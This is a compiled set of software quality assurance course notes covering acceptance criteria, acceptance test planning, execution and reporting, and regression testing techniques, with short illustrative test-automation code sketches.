Compliance The system should comply with the relevant technical standards, such as the IEEE standards, operating system interface standards, and the IP standards. In addition, the system should comply with regulatory requirements as established by external agencies. The following questions must be addressed in specifying the acceptance criteria for compliance:

• With what technical standards should the system comply? Are there any exceptions to these standards? If yes, specify the exceptions.

• Which regulatory bodies must certify the system?

Installability and Upgradability The purpose of system installability and upgradability criteria is to ensure that the system can be correctly installed and upgraded in the customer environment. If for some reason the customer wants to uninstall or downgrade the system software, it is required to be done smoothly. Installation and upgradation of a system is planned by identifying the major milestones and contingency steps. The system installation and upgradation process document must be available with specific steps. The acceptance criteria for system installation and upgradation are as follows:

• The document must identify the person to install the system, for example, the end user or a trained technician from the supplier side.

• Over what range of platforms, configurations, and versions of support software is the installation or upgradation process expected to work? The hardware and software requirements must be clearly explained in the document.

• Can the installation or upgradation process change the user's existing environment? If yes, the risks of this change should be clearly documented.

• The installation or upgradation process should include diagnostic and corrective steps to be used in the event of the process not progressing as expected.

• The installation or upgradation process should contain a workable uninstall, downgrade, or backoff process in case a specific installation does not proceed as expected.

• The installation or upgradation process should work correctly from all of the various delivery media, such as download via File Transfer Protocol (FTP), CD-ROM, and DVD.

• If the system includes a licensing and registration process, it should work smoothly and should be documented.

• The installation or upgradation instructions should be complete, correct, and usable.

• The installation or upgradation process should be verified during system testing.

• There should be zero defects outstanding against the system installation or upgradation process.

Scalability The scalability of a system is defined as its ability to effectively provide acceptable performance as the following quantities increase: (i) geographic area of coverage of a system, (ii) system size in terms of the number of elements in the system, (iii) number of users, and (iv) volume of workload per unit time. A system may work as expected in limited-use scenarios but may not scale up very well. The following questions must be addressed in specifying the scalability acceptance criteria:

• How many concurrent users is the system expected to handle?

• How many transactions per unit time is the system expected to process?

• How many database records is the system expected to support?

• How many elements, or objects, must be managed in live operation?

• What is the largest geographic area the system can cover?


Documentation The quality of the system user's guide must be high. The documentation acceptance criteria are formulated as follows:

• All the user documents should be reviewed and approved by the software quality assurance group for correctness, accuracy, readability, and usefulness.

• The on-line help should be reviewed and signed off by the software quality assurance group.

14.3 SELECTION OF ACCEPTANCE CRITERIA

The acceptance criteria discussed above provide a broad idea about customer needs and expectations, but they are too many and very general. The customer needs to select a subset of the quality attributes and prioritize them to suit their specific situation. Next, the customer identifies the acceptance criteria for each of the selected quality attributes. When the customer and the software vendor reach an agreement on the acceptance criteria, both parties must keep in mind that satisfaction of the acceptance criteria is a trade-off between time, cost, and quality. As Ed Yourdon opined, sometimes less than perfect is good enough [6]. Only business goals and priority can determine the degree of "less than perfect" that is acceptable to both parties. Ultimately, the acceptance criteria must be related to the business goals of the customer's organization.

Many organizations associated with different application domains have selected and customized existing quality attributes to define quality for themselves, taking into consideration their specific business and market situation. For example, IBM used the quality attribute list CUPRIMDS—capability, usability, performance, reliability, installation, maintenance, documentation, and service—for its products [7]. Similarly, for web-based applications [8], a set of quality attributes has been identified in decreasing order of priority: reliability, usability, security, availability, scalability, maintainability, and time to market. Such a prioritization scheme is often used in specific application domains. For example, usability and maintainability take precedence over performance and reliability for word processor software. On the other hand, it might be the other way around for a real-time operating system or telecommunication software.

14.4 ACCEPTANCE TEST PLAN

Planning for acceptance testing begins as soon as the acceptance criteria are known. Early development of an acceptance test plan (ATP) gives us a good picture of the final product. The purpose of an ATP is to develop a detailed outline of the process to test the system prior to making a transition to the actual business use of the system. Often, the ATP is delivered by the vendor as a contractual agreement, so that business acceptance testing can be undertaken within the vendor's development organization to ensure that the system eventually passes the acceptance test.


In developing an ATP, emphasis is put on demonstrating that the system works according to the customer's expectation, rather than passing a set of comprehensive tests. In any case, the system is expected to have already passed a set of comprehensive tests during system-level testing. The ATP must be kept very simple because the audience of this plan may include people from diverse backgrounds, such as marketing and business managers. Some people argue that the ATP is redundant and unnecessary if a comprehensive system test plan is developed. We believe that even if a system test plan is adequate, acceptance tests usually uncover additional significant problems. Moreover, the user's concerns are not addressed during system-level testing.

An ATP needs to be written and executed by the customer's special user group. The user group consists of people from different backgrounds, such as software quality assurance engineers, business associates, and customer support engineers. In addition, the acceptance test cases are executed in the user's operational environment, whereas the system-level test cases are executed in a laboratory environment. An overall test plan for acceptance testing and descriptions of specific tests are documented in the ATP. The structure of a typical ATP is outlined in Table 14.1.

The introduction section of the ATP describes the structure of the test plan and what we intend to accomplish with it. This section typically includes (i) the test project name, (ii) revision history, (iii) terminology and definitions, (iv) names of the approvers and the date of approval, (v) an overview of the plan, and (vi) references.

For each quality category from the signed-off acceptance criteria document, two subsections are created: operational environment and test case specification. The operational environment subsection deals with site preparation for the execution of the acceptance test cases. Test cases are specified for each acceptance criterion within the quality category.

An outline of the timeline of execution of acceptance tests is provided in the schedule section of the ATP. Acceptance test execution is not intended to be exhaustive, and therefore it does not continue for long.

TABLE 14.1 Outline of ATP

1. Introduction

2. Acceptance test category. For each category of acceptance criteria:

(a) Operational environment

(b) Test case specification

(i) Test case ID number

(ii) Test title

(iii) Test objective

(iv) Test procedure

3. Schedule

4. Human resources


The acceptance test may take up to six weeks for a large system. The point here is that comprehensive acceptance testing, to the same extent and depth as targeted by system-level testing, is not required to demonstrate that the acceptance criteria are satisfied by the system.

The human resources section of the ATP deals with (i) the identification of the acceptance testers from the client organization and (ii) their specific roles in the execution of acceptance test cases. The section includes acceptance test site preparation, overseeing installation of new hardware, upgrading the software, and setting up of the networks. These are the people who are knowledgeable in the operational environment and business operations. In addition, the human resources requirement from the supplier organization during the acceptance testing is included in this section. These engineers are usually from the supplier's system test group, who participated in testing the system.

The ATP is reviewed and approved by the relevant groups, such as the marketing, customer support, and software quality assurance groups. It can be shared with the system supplier organization.

14.5 ACCEPTANCE TEST EXECUTION

The acceptance test cases are divided into two subgroups. The first subgroup consists of basic test cases, and the second consists of test cases that are more complex to execute. The acceptance tests are executed in two phases. In the first phase, the test cases from the basic test group are executed. If the test results are satisfactory, then the second phase, in which the complex test cases are executed, is taken up. In addition to the basic test cases, a subset of the system-level test cases is executed by the acceptance test engineers to independently confirm the test results. Obviously, a key question is: Which subset of the system-level test cases should be selected? It is recommended to randomly select 5–10 test cases from each test category. If a very large fraction, say more than 0.95, of the basic test cases pass, then the second phase can proceed. It may be counterproductive to carry out the execution of the more complex tests if a significant fraction of the basic tests fail.
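The two-phase policy described above can be expressed in a few lines, as in the sketch below. It is illustrative only: the test runner is a placeholder, while the 0.95 gate and the random 5–10 sample per category follow the recommendation in the text.

# Sketch of two-phase acceptance test execution with a pass-rate gate.
import random

def run(test):
    # Placeholder for real test execution; assumed to return True on pass.
    return test()

def acceptance_run(basic_tests, complex_tests, system_tests_by_category):
    passed = sum(run(t) for t in basic_tests)
    if passed / len(basic_tests) <= 0.95:
        return "stop: too many basic-test failures"
    # Independently re-confirm a random 5-10 system-level tests per category.
    for category, tests in system_tests_by_category.items():
        sample = random.sample(tests, k=min(len(tests), random.randint(5, 10)))
        for t in sample:
            run(t)
    for t in complex_tests:
        run(t)
    return "phase 2 executed"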

Acceptance test execution is an important activity performed by the customer with much support from the developers. The activity includes the following detailed actions:

• The developers train the customer on the usage of the system.

• The developers and the customer coordinate the fixing of any problem discovered during acceptance testing.

• The developers and the customer resolve the issues arising out of any acceptance criteria discrepancy.

System-level test personnel from the development organization travel to the customer location where the acceptance tests are to be conducted.


TABLE 14.2 ACC Document Information

1. ACC number A unique number

2. Acceptance criteria affected Existing acceptance criteria

3. Problem/issue description Brief description of issue

4. Description of change required Description of changes needed to be made to the original acceptance criterion

5. Secondary technical impacts Description of impact it will have on system

6. Customer impacts Impact it will have on end user

7. Change recommended by Name of acceptance test engineer(s)

8. Change approved by Name of approver(s) from both parties

They assist the customer in preparing a test site and train the acceptance test engineers in how to use the system. They provide the earlier system-level test results to the customer's test engineers in order to make informal decisions about the direction and focus of the acceptance testing effort. In addition, the on-site system test engineers answer the customer's questions about the system and assist the acceptance test engineers in executing the acceptance tests.

Any defects encountered during acceptance testing are reported to the software development organization through the on-site system test engineers. The defects are submitted through the defect tracking system. When the defects are fixed, the software build is retested by the supplier, and a satisfactory software image is made available to the customer for continuation of acceptance testing. The failed tests are repeated after the system is upgraded with the new software image. An agreement must be reached between the on-site system test engineers and the acceptance test engineers on when to accept a new software image for acceptance testing. The number of times the system can be upgraded to a new software image during acceptance testing is negotiated between the customer and the supplier. Multiple failures of a system during acceptance testing are an indication of poor system quality.

It is possible that an acceptance test engineer may encounter issues related to the acceptance criteria during the execution of acceptance test cases. The system may not provide services to the users as described in the acceptance criteria. Any deviation from the acceptance criteria discovered at this stage may not be fixed immediately. The acceptance test engineer may create an acceptance criteria change (ACC) document to communicate the deficiency in the acceptance criteria to the supplier. A representative format of an ACC document is shown in Table 14.2. An ACC report is generally given to the supplier's marketing department through the on-site system test engineers.

14.6 ACCEPTANCE TEST REPORT

Acceptance test activities are designed to reach one of three conclusions: accept the system as delivered, accept the system after the requested modifications have been made, or do not accept the system. Usually some useful intermediate decisions are made before making the final decision:

• A decision is made about the continuation of acceptance testing if the results of the first phase of acceptance testing are not promising. One may recall that the basic tests are executed in the first phase.

• If the test results are unsatisfactory, changes will be made to the system before acceptance testing can proceed to the next phase.

The intermediate decisions are made based on an evaluation of the results of the first phase of testing. Moreover, during the execution of acceptance tests, the status of testing is reviewed at the end of every working day by the leader of the acceptance test team, the on-site system test engineers, and the project managers of the customer and the supplier. Before they meet, the acceptance team prepares a test report which forms the basis of discussion at the review meeting. A template of the test report is given in Table 14.3.

The test report is reviewed on a daily basis to understand the status and progress of acceptance testing. If serious problems are encountered during acceptance testing, the project manager flags the issues to senior management.

At the end of the first and second phases of acceptance testing, an acceptance test report is generated by the test team leader. A template for the report is outlined in Table 14.4. Most of the information from the test status report can be used in the acceptance test summary report.

The report identifier uniquely identifies the report. It is used to keep track of the document under version control.

The summary section summarizes what acceptance testing activities took place, including the test phases, releases of the software used, and the test environment. This section normally includes references to the ATP, acceptance criteria, and requirements specification.

The variances section describes any difference between the testing that was planned and the actual testing carried out. It provides insight into a process for improving acceptance test planning in the future.

TABLE 14.3 Structure of Acceptance Test Status Report

1. Date Acceptance report date

2. Test case execution status Number of test cases executed today

Number of test cases passing

Number of test cases failing

3. Defect identifier Submitted defect number

Brief description of issue

4. ACC number(s) Acceptance criteria change document number(s), if any

5. Cumulative test execution status Total number of test cases executed

Total number of test cases passing

Total number of test cases failing

Total number of test cases not executed yet


TABLE 14.4 Structure of Acceptance Test Summary Report

1. Report identifier

2. Summary

3. Variances

4. Summary of results

5. Evaluation

6. Recommendations

7. Summary of activities

8. Approval

In the summary of results section of the document, test results are summarized. The section gives the total number of test cases executed, the number of passing test cases, and the number of failing test cases; identifies all the defects; and summarizes the acceptance criteria to be changed.

The evaluation section provides an overall assessment of each category of the quality attributes identified in the acceptance criteria document, including their limitations. This evaluation is based on the test results from each category of the test plan. The deviations from the acceptance criteria that are captured in the ACCs during the acceptance testing are discussed.

The recommendations section includes the acceptance test team's overall recommendation: (i) unconditionally accept the system, (ii) accept the system subject to certain conditions being met, or (iii) reject the system. However, the ultimate decision is made by the business experts of the supplier and the buyer organizations.

The summary of activities section summarizes the testing activities and the major events. This section includes information about the resources consumed by the various activities. For example, the total manpower involved in and the time spent for each of the major testing activities are given. This section is useful to management for accurately estimating future acceptance testing efforts.

Finally, the names and titles of all the people who will approve the report are listed in the approvals section. Ideally, the approvers of this report should be the same people who approved the corresponding ATP, because the summary report describes all the activities outlined in the ATP. If some of the reviewers have minor disagreements, they may note their views before signing off on the document.

14.7 ACCEPTANCE TESTING IN EXTREME PROGRAMMING

In the XP [9] framework, user stories are used as acceptance criteria. The user stories are used to derive time estimates for each development iteration in release planning (time-to-market acceptance criteria) and acceptance tests. The user stories are written by the customer as things that the system needs to do for them. The stories are usually about two to three sentences of text written using the customer's terminology. Several acceptance tests are created to verify that a user story has been correctly implemented. Acceptance tests are specified in a format that is clear enough that the customer can understand and specific enough that they can be executed.

The customer is responsible for verifying the correctness of the acceptance tests and reviewing the test results [10]. The acceptance test results are reviewed by the customer to decide which failed tests are of highest priority and must pass during the next iteration. A story is incomplete until it passes its associated acceptance tests.

Acceptance tests are executed by an acceptance test group, which is a part of the development team. Ideally, acceptance tests should be automated, using either the unit testing framework or a separate acceptance testing framework, before coding. Once the acceptance tests are automated, acceptance test engineers and customers can run them multiple times per day as a regression acceptance test suite. An automated acceptance test suite does not lose its value even after the customer has approved the successful implementation of the user story in a development iteration. The acceptance tests take on the role of regression tests to ensure that subsequent changes to the system do not affect the unaltered functionality.
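A short example of what such an automated acceptance test might look like is given below, using the pytest framework. The user story ("a user can add items to a shopping cart") and the Cart class are invented for illustration; once written, the same tests can be re-run on every build as regression tests.

# Automated acceptance tests for an invented user story, in pytest style.
import pytest

class Cart:
    def __init__(self):
        self.items = []

    def add(self, item: str, qty: int = 1) -> None:
        if qty < 1:
            raise ValueError("quantity must be positive")
        self.items.append((item, qty))

    def total_items(self) -> int:
        return sum(qty for _, qty in self.items)

def test_user_can_add_item_to_cart():
    # Story: "A user can add items to the cart and see the item count."
    cart = Cart()
    cart.add("book", 2)
    assert cart.total_items() == 2

def test_rejects_non_positive_quantity():
    # The story's error-handling expectation, expressed as a test.
    with pytest.raises(ValueError):
        Cart().add("book", 0)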


Regression Testing

What is Regression Testing?

Regression testing means retesting the unchanged parts of the application. Test cases are re-executed in order to check whether the previous functionality of the application is working fine and the new changes have not introduced any new bugs. This test can be performed on a new build when there is a significant change in the original functionality, or even after a single bug fix.

This is a method of verification: verifying that the bugs are fixed and that the newly added features have not created any problems in the previously working version of the software.

Testers perform functional testing when a new build is available for verification. The intent of this test is to verify the changes made to the existing functionality and the newly added functionality. When this test is done, the tester should verify that the existing functionality is working as expected and that the new changes have not introduced any defects in functionality that was working before the change. Regression testing should be part of the release cycle and must be considered in test estimation. Regression testing is usually performed after verification of changes or new functionality, but this is not always the case. For a release taking months to complete, regression tests must be incorporated into the daily test cycle. For weekly releases, regression tests can be performed when functional testing of the changes is over.

Why Regression Test?


What is Regression Testing?

Regression testing is a black-box testing technique that consists of re-executing those tests that are impacted by code changes. These tests should be executed as often as possible throughout the software development life cycle.

Types of Regression Tests:

1. Regular Regression Testing: A regular regression test is performed between test cycles to verify that the recent code changes made for defect fixes or enhancements have not broken any other parts of the application, and that the functionality that was working in the earlier test cycle continues to work.

2. Final Regression Testing: A final regression test is performed to validate a build that hasn't changed for a period of time. This build is then deployed or shipped to customers.

Selecting Regression Tests:

• Selecting regression tests requires knowledge about the system and how it is affected by the existing functionalities.

• Tests are selected based on the area of frequent defects.

• Tests are selected to include the area which has undergone code changes many times.

• Tests are selected based on the criticality of the features.


Regression Testing Steps:

Regression tests are ideal candidates for automation, which results in a better return on investment (ROI).

• Select the tests for regression.
• Choose the apt tool and automate the regression tests.
• Verify applications with checkpoints.
• Manage regression tests and update them when required.
• Schedule the tests.
• Integrate with the builds.
• Analyze the results.
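One possible way to wire the "schedule, integrate, analyze" steps into a build is sketched below: a small script that runs the regression-marked tests with pytest and reports the outcome. The "regression" marker, the tests/ path, and the report file name are assumptions for illustration, not fixed conventions.

# Sketch of a build-integrated regression run using pytest.
import subprocess
import sys

def run_regression_suite() -> int:
    result = subprocess.run(
        [sys.executable, "-m", "pytest", "-m", "regression", "tests/",
         "--junitxml=regression-report.xml"],
        capture_output=True, text=True,
    )
    print(result.stdout[-2000:])   # tail of the run log for quick review
    return result.returncode       # 0 means the suite passed

if __name__ == "__main__":
    raise SystemExit(run_regression_suite())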

Need of Regression Testing

Regression Testing is required when there is a

• Change in requirements, where code is modified according to the requirement
• New feature added to the software
• Defect fixing
• Performance issue fix

The purpose of regression testing is to confirm that a recent program or code change has not adversely affected existing features.

Regression testing is nothing but full or partial selection of already executed test cases which are re-executed to ensure existing functionalities work fine.

This testing is done to make sure that new code changes do not have side effects on the existing functionalities. It ensures that the old code still works once the new code changes are made.

Regression testing is initiated when programmers fix a bug or add new code for new functionality to the system. There can be many dependencies between the newly added and existing functionality. It is a quality measure to check that the new code complies with the old code and that unmodified code is not affected. Most of the time, the testing team has the task of checking last-minute changes in the system. In such situations, testing only the affected application area is necessary to complete the testing process in time while covering all major system aspects.

This test is very important when there are continuous changes/improvements added to the application. The new functionality should not negatively affect existing tested code.


DEFINITION

Regression testing is a type of software testing that intends to ensure that changes (enhancements or defect fixes) to the software have not adversely affected it.

Regression testing: During confirmation testing, the defect got fixed and that part of the application started working as intended. But there is a possibility that the fix may have introduced or uncovered a different defect elsewhere in the software. The way to detect these ‘unexpected side-effects’ of fixes is to do regression testing. The purpose of regression testing is to verify that modifications in the software or the environment have not caused unintended adverse side effects and that the system still meets its requirements. Regression tests are mostly automated, because the same tests are carried out again and again after every fix, and it would be very tedious to run them manually. Regression tests are executed whenever the software changes, either as a result of fixes or of new or changed functionality.

Regression Testing Techniques

Software maintenance is an activity which includes enhancements, error corrections, optimization and deletion of existing features. These modifications may cause the system to work incorrectly. Therefore, regression testing becomes necessary. Regression testing can be carried out using the following techniques:

1. Retest All

• This is one of the methods for regression testing in which all the tests in the existing test bucket or suite should be re-executed. This is very expensive as it requires huge time and resources.

Page 559: CP 7026 - Software Quality Assurance

2. Regression Test Selection

• Instead of re-executing the entire test suite, it is better to select a part of the test suite to be run.
• Selected test cases can be categorized as 1) Reusable Test Cases and 2) Obsolete Test Cases.
• Reusable test cases can be used in succeeding regression cycles.
• Obsolete test cases can't be used in succeeding cycles.

3. Prioritization of Test Cases

• Prioritize the test cases depending on business impact and on critical and frequently used functionalities. Selecting test cases based on priority will greatly reduce the regression test suite.

How to do Regression Testing

A test methodology for an effective regression testing is made up of the following steps:

1. Performing an initial “Smoke” or “Sanity” test
2. Understanding the criteria for selecting the test cases for regression testing
3. Prioritization of test cases
4. Methodology for selecting test cases
5. Resetting the test cases for test execution
6. Concluding the result of a regression test cycle

1. Performing an initial “Smoke” or “Sanity” test

A subset of the regression test cases can be set aside as smoke tests. A smoke test is a group of test cases that establish that the system is stable and that all major functionality is present and works under “normal” conditions. Smoke tests are often automated, and the selection of test cases is broad in scope. The smoke tests might be run before deciding to proceed with further testing (why dedicate resources to testing if the system is very unstable?). The purpose of smoke tests is to demonstrate stability, not to find bugs. Sanity testing checks whether the major functionality of the system is working. If the sanity test fails, the build is rejected, to save the time and cost involved in more rigorous testing.
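As an illustration, a smoke subset is often kept tagged inside the automated suite so it can be run first against every build. Below is a minimal sketch using Python's pytest markers; the login/homepage checks are hypothetical stand-ins for real build-acceptance checks:

    import pytest

    # Stand-ins for the application under test; a real suite would drive the
    # application's entry points or key pages instead.
    def login(user, password):
        return user == "demo" and password == "demo"

    def homepage_html():
        return "<html><head><title>Storefront</title></head><body>ok</body></html>"

    @pytest.mark.smoke
    def test_login_works():
        # Broad-scope check: major functionality must work under normal conditions.
        assert login("demo", "demo")

    @pytest.mark.smoke
    def test_homepage_renders():
        # Failure here means the build is too unstable for further testing.
        assert "<title>Storefront</title>" in homepage_html()

Running only the tagged subset (pytest -m smoke) gives the accept/reject decision for the build before any deeper regression cycle begins; the smoke marker would be registered in pytest.ini to avoid warnings.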

2. Criteria to select test cases for Regression Testing

Industry data shows that a good number of the defects reported by customers are due to last-minute bug fixes creating side effects; hence, selecting test cases for regression testing is an art, and not an easy one.

Page 560: CP 7026 - Software Quality Assurance

The selection of test cases for regression testing:

• Requires knowledge of the bug fixes and how they affect the system.
• Includes the areas of frequent defects.
• Includes the areas which have undergone many/recent code changes.
• Includes the areas which are highly visible to the users.
• Includes the core features of the product which are mandatory requirements of the customer.

Selection of test cases for regression testing depends more on the criticality of the bug fixes than on the criticality of the defect itself. A minor defect can result in a major side effect, and a bug fix for an extreme defect can have no side effect or just a minor one. So the test engineer needs to balance these aspects when selecting the test cases for regression testing.

3. Prioritization of test cases

Prioritizing the test cases depends on business impact and on critical and frequently used functionality. Selecting test cases based on priority will reduce the test suite. The test cases may be classified into three categories:

Priority-0: These test cases can be called sanity test cases; they check the basic functionality and are run to accept the build for further testing. They are also run when a project goes through major changes. These test cases deliver a very high project value to both development teams and customers.

Priority-1: Uses the basic and normal setup and these test cases deliver high project value to both development teams and customers.

Priority-2: These test cases deliver moderate project value and are executed as a part of software testing life cycle and selected for regression on need basis.

Page 561: CP 7026 - Software Quality Assurance

4. Methodology for selecting test cases

Once the test cases are prioritized, test cases can be selected. There could be several approaches to regression testing which need to be decided on a case by case basis. For example:

Case 1: If the criticality and impact of the defect fixes are low, then it is enough to select a few test cases from the Test Case DataBase (TCDB) and execute them. These can fall under any priority (0, 1, or 2).

Case 2: If the criticality and the impact of the bug fixes are medium, then we need to execute all Priority-0 and Priority-1 test cases. If the bug fixes need additional test cases from Priority-2, then those test cases can also be selected and used for regression testing. Selecting Priority-2 test cases in this case is desirable but not a must.

Case 3: If the criticality and impact of the bug fixes are High, then we need to execute all Priority-0, Priority-1 and carefully selected Priority-2 test cases.

The above methodology requires impact analysis of the bug fixes for all defects, which can be a time-consuming process. If there is not enough time and the risk of not doing impact analysis is low, then the following alternative methodologies can be used:

1. Regress All: All priority 0, 1, and 2 test cases are re-run.
2. Priority-based Regression: Based on priority, all priority 0, 1, and 2 test cases are run in order, subject to the availability of time.
3. Random Regression: Random test cases are selected and executed.
4. Regress Changes: Code changes are compared to the last cycle of testing, and test cases are selected based on their impact on the code.

An effective regression strategy is usually a combination of all of the above.
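A small sketch of the case-based selection above, in Python. The TestCase structure, the priority encoding, and the sample TCDB entries are illustrative assumptions, not a prescribed format:

    from dataclasses import dataclass

    @dataclass
    class TestCase:
        name: str
        priority: int  # 0 = sanity, 1 = high value, 2 = moderate value

    def select_for_regression(tcdb, fix_criticality, extra_p2=frozenset()):
        """Pick test cases from the TCDB based on bug-fix criticality."""
        if fix_criticality == "low":
            # Case 1: a few test cases are enough; any priority will do.
            return tcdb[:5]
        if fix_criticality == "medium":
            # Case 2: all P0 and P1, plus optional hand-picked P2 cases.
            chosen = [t for t in tcdb if t.priority <= 1]
            chosen += [t for t in tcdb if t.priority == 2 and t.name in extra_p2]
            return chosen
        # Case 3 (high): all P0/P1 plus carefully selected P2 cases.
        return [t for t in tcdb if t.priority <= 1
                or (t.priority == 2 and t.name in extra_p2)]

    tcdb = [TestCase("login", 0), TestCase("checkout", 1), TestCase("report_export", 2)]
    print([t.name for t in select_for_regression(tcdb, "medium", {"report_export"})])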


5. Resetting the test cases for execution

Resetting of the test cases needs to be done with the following considerations:

1. When there is a major change in the product.
2. When there is a situation where the expected results of the test cases could be quite different from previous cycles.
3. Whenever existing application functionality is removed, the related test cases can be reset.
4. When there is a change in the build procedure which affects the product.
5. In a large release cycle where some test cases were not executed for a long time.
6. When you are in the final regression test cycle with a few selected test cases.

6. Concluding the Result of Regression Testing

Regression testing should use only one build for testing (if it does not, doing so is strongly recommended). It is expected that 100% of the test cases pass using that build. In situations where the pass percentage is not 100, the test manager can look at a test case's previous results to conclude the expected result.

1. If the result of a particular test case was PASS using the previous builds and FAIL in the current build, then regression failed. We need to get a new build and start the testing from scratch after resetting the test cases.

2. If the result of a particular test case was a FAIL using the previous builds and a PASS in the current build, then it is easy to assume the bug fixes worked.

3. If the result of a particular test case was a FAIL using the previous builds and a FAIL in the current build and if there are no bug fixes for this particular test case, it may mean that the result of this test case shouldn’t be considered for the pass %. This may also mean that such test cases shouldn’t be selected for regression.
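These three rules translate directly into a build-over-build comparison. The sketch below assumes each build's results are available as simple test-name to PASS/FAIL maps, which is an illustrative format:

    # Compare each test's result on the previous build with the current build.
    def classify(previous, current, has_fix):
        for test, prev in previous.items():
            curr = current.get(test)
            if prev == "PASS" and curr == "FAIL":
                print(f"{test}: regression failed - get a new build, reset and retest")
            elif prev == "FAIL" and curr == "PASS":
                print(f"{test}: the bug fix appears to have worked")
            elif prev == "FAIL" and curr == "FAIL" and not has_fix.get(test, False):
                print(f"{test}: exclude from the pass % and from future regression runs")

    previous = {"login": "PASS", "checkout": "FAIL", "export": "FAIL"}
    current = {"login": "FAIL", "checkout": "PASS", "export": "FAIL"}
    classify(previous, current, has_fix={"checkout": True})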

ELABORATION

There is always a likelihood that a code change will impact functionality not directly associated with that code, so it is essential to perform regression testing to make sure that fixing one thing has not broken another. During regression testing, new test cases are not created; previously created test cases are re-executed.

LEVELS APPLICABLE TO

Regression testing can be performed during any level of testing (Unit, Integration, System, or Acceptance) but it is mostly relevant during System Testing.


EXTENT

In an ideal case, a full regression test is desirable but oftentimes there are time/resource constraints. In such cases, it is essential to do an impact analysis of the changes to identify areas of the software that have the highest probability of being affected by the change and that have the highest impact to users in case of malfunction and focus testing around those areas.

Due to the scale and importance of regression testing, more and more companies and projects are adopting regression test automation tools.

How Much Regression Testing? This depends on the scope of the newly added feature. If the scope of the fix or feature is large, then the affected application area is quite large, and testing should be performed thoroughly, including all the application's test cases. This can be decided effectively when the tester gets input from the developer about the scope, nature, and amount of change.

Types of Regression tests: As these are repetitive tests, test cases can be automated so that a set of test cases can be easily executed on each new build. Regression test cases need to be selected very carefully, so that a minimum set of test cases covers maximum functionality. This set of test cases needs continuous improvement as functionality is added. It becomes very difficult when the application scope is very large and there are continuous increments or patches to the system. In such cases, selective tests need to be executed in order to save testing cost and time. These selective test cases are picked based on the enhancements done to the system and the parts they can affect the most.

What We Do in Regression Test?

• Rerunning the previously conducted tests
• Comparing current results with previously executed test results

This is a continuous process performed at various stages throughout the software testing life cycle. A best practice is to conduct a regression test after sanity or smoke testing, and at the end of functional testing for a short release.

To conduct effective testing, a regression test plan should be created. This plan should outline the regression testing strategy and the exit criteria. Performance testing is also part of this test, to make sure system performance is not affected by the changes made to system components.

Regression testing best practices: Run automated test cases every evening so that any regression side effects can be fixed in the next day's build. This reduces release risk by covering almost all regression defects in the early stages, rather than finding and fixing them at the end of the release cycle.


Automated Regression Testing

Automated regression testing is the testing area where we can automate most of the testing effort. We run all the previously executed test cases on a new build. This means a test case set is available, and running these test cases manually is time consuming. Since we know the expected results, automating these test cases is a time-saving and efficient regression test method. The extent of automation depends on the number of test cases that remain applicable over time. If test cases keep changing as the application scope increases, then automation of the regression procedure will be a waste of time.

Most regression test tools are of the record-and-playback type. You record the test cases by navigating through the AUT (application under test) and verify whether the expected results appear.

Regression of GUI applications: It is difficult to perform GUI (Graphical User Interface) regression testing when the GUI structure is modified. The test cases written for the old GUI either become obsolete or need modification. Reusing regression test cases means the GUI test cases are modified according to the new GUI. This task becomes cumbersome if you have a large set of GUI test cases.

Selecting test cases for regression testing

Effective regression tests can be done by selecting the following test cases:

• Test cases which have frequent defects
• Functionalities which are more visible to the users
• Test cases which verify core features of the product
• Test cases of functionalities which have undergone more and recent changes
• All integration test cases
• All complex test cases
• Boundary value test cases
• A sample of successful test cases
• A sample of failed test cases

Regression Testing Tools

If your software undergoes frequent changes, regression testing costs will escalate. In such cases, manual execution of test cases increases test execution time as well as costs.


Automation of regression test cases is the smart choice in such cases. The extent of automation depends on the number of test cases that remain re-usable for successive regression cycles. The following are the most important tools used for both functional and regression testing:

Quick Test Professional (QTP): HP QuickTest Professional is automated software designed to automate functional and regression test cases. It uses the VBScript language for automation and is a data-driven, keyword-based tool.

Rational Functional Tester (RFT): IBM's Rational Functional Tester is a Java-based tool used to automate the test cases of software applications. It is primarily used for automating regression test cases, and it also integrates with Rational Test Manager.

Selenium: This is an open-source tool used for automating web applications. Selenium can be used for browser-based regression testing.
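As a hedged illustration of browser-based regression checking, the sketch below uses Selenium's Python bindings to replay one checkpoint against a build. The URL and the expected title/heading are placeholders; a real suite would replay the recorded user journeys of the AUT:

    from selenium import webdriver
    from selenium.webdriver.common.by import By

    driver = webdriver.Chrome()  # assumes a local Chrome/chromedriver set-up
    try:
        driver.get("https://example.com/")  # placeholder application URL
        # Checkpoints: compare against the values recorded on the last good
        # build; a mismatch flags a possible regression.
        assert "Example Domain" in driver.title
        heading = driver.find_element(By.TAG_NAME, "h1")
        assert heading.text == "Example Domain"
    finally:
        driver.quit()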

Regression Testing and Configuration Management

Configuration management during regression testing becomes imperative in agile environments, where code is being continuously modified. To ensure effective regression tests, observe the following:

• The code being regression tested should be under a configuration management tool.
• No changes must be allowed to the code during the regression test phase; the regression-tested code must be kept immune to developer changes.
• The database used for regression testing must be isolated; no database changes must be allowed.

Difference between Re-testing and regression testing:

Retesting means testing the functionality or bug again to ensure the code is fixed. If it is not fixed, the defect needs to be re-opened; if fixed, the defect is closed.

Regression testing means testing your software application when it undergoes a code change to ensure that the new code has not affected other parts of the software.

SOME BENEFITS OF REGRESSION TESTING

1. Regression testing increases our chances of detecting bugs caused by changes to the software, whether enhancements or defect fixes. Keep in mind, however, that performing regression testing gives no guarantee that there are no side effects.


2. Regression testing also detects undesirable side effects caused by changing the operating environment.

3. A regression test set is also useful for a new way of doing integration testing. This new approach is faster and less confusing than the old way of doing integration testing, but you always need some sort of regression test set to do it.

Challenges in Regression Testing:

The following are the major problems in doing regression testing:

• With successive regression runs, test suites become fairly large. Due to time and budget constraints, the entire regression test suite cannot be executed.
• Minimizing the test suite while achieving maximum test coverage remains a challenge.
• Determining the frequency of regression tests (i.e., after every modification, after every build update, or after a bunch of bug fixes) is a challenge.

An effective regression strategy saves organizations both time and money. As per a case study in the banking domain, regression testing saved up to 60% of the time spent on bug fixes (defects that would have been caught by regression tests) and 40% of the money.

Regression testing is essential for large software applications, as it is often difficult to know whether fixing one issue has created a new issue in a different part of the application. For example, a change to a bank application's loan module may result in the failure of a monthly transaction report. In most cases, such issues appear unrelated, but they can be a real source of frustration for application developers. Other situations requiring regression testing include detecting whether certain changes accomplish an intended goal, or testing for new dangers associated with issues that reemerge after a trouble-free period.


Modern regression testing is primarily handled via specialized commercial testing tools that take existing software snapshots that are then compared after applying a specific change. It is almost impossible for human testers to perform the same tasks as efficiently as automated software testers. This is especially true with large and complex software applications within vast computing environments such as banks, hospitals, manufacturing enterprises and large retailers.

WHY WE PERFORM REGRESSION TESTING?

